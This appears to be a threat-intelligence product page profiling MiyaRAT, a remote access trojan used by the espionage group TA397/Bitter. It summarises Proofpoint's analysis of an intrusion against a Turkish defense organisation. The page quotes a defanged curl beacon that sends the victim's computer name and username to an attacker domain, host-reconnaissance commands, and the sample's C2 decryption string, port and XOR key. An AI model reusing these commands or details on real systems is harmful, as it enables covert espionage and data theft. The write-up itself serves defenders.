MiyaRAT is a C++ remote access trojan used by TA397, also known as Bitter, a state-backed espionage threat actor assessed to operate in support of Indian government interests. Reporting places MiyaRAT in active use during late 2024 and 2025, including campaigns targeting government and defense organizations, with specific evidence of deployment against a Turkish defense-sector organization in November 2024. In the observed intrusion, TA397 used spearphishing from a compromised government email account with a Madagascar infrastructure-themed lure. The malicious archive contained a decoy World Bank PDF, a PDF-masquerading LNK, and an NTFS alternate data stream holding PowerShell. Execution created a scheduled task named DsSvcCleanup that beaconed every 17 minutes to jacknwoods[.]com and sent the victim computer name and username. After hands-on-keyboard operator activity and host reconnaissance, TA397 downloaded gfxview.msi from jacknwoods[.]com, which installed the MiyaRAT payload xrgtg.exe. MiyaRAT supports directory listing, file deletion, reverse shells, file transfer, and screenshots. In the analyzed sample, it decrypted the C2 domain samsnewlooker[.]com using the string "doobiedoodooziezzz," used hardcoded port 56189, XOR-encrypted outbound data with 0x43, and reported malware version 3.0 in its initial beacon. Proofpoint assessed MiyaRAT and WmRAT as distinct malware families in active operational use by TA397, with MiyaRAT likely the newer tool.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Following that, Proofpoint researchers observed TA397 dropping another payload by downloading and running “gfxview.msi”... This acted as the dropper to install “xrgtg.exe” which was the MiyaRAT payload.
17 distinct techniques documented for this family, organized by ATT&CK tactic.
The attack chain used... a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads... the command then set up a scheduled task named “DsSvcCleanup”.
This scheduled task attempted to send target host information (username and computer name) with the curl utility every 17 minutes... GET hxxp://jacknwoods[.]com/jacds.php?jin=%computername%_%username%
TA397 issuing the following commands to enumerate the target machine: cd C:\programdata dir >> abc.pdf tasklist >> abc.pdf wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName >> abc.pdf
This scheduled task attempted to send target host information with the curl utility every 17 minutes to the domain jacknwoods[.]com... Proofpoint observed TA397 operators respond to these requests with manual commands...
WmRAT... can... upload or download files... MiyaRAT supports: SFS – connect to new socket to upload and download files via UPL/DWNL | This command downloads and runs the “anvrsa.msi” file on the target machine which installs the WmRAT file “anvrsa.exe”... Following that, Proofpoint researchers observed TA397 dropping another payload by downloading and running “gfxview.msi”.
8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
C++ malware family used alongside WmRAT in an espionage intrusion against a Turkish defense-sector organization.
Remote access trojan used by Bitter/TA397 in targeting activity (Turkey noted) as part of an espionage-focused toolset.
Custom remote access trojan used by Bitter/TA397 as part of its more advanced tooling for targeted espionage intrusions.
MiyaRAT is a remote access trojan (RAT) used by TA397 for persistent access and espionage, allowing the threat actor to control infected systems and exfiltrate sensitive data.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.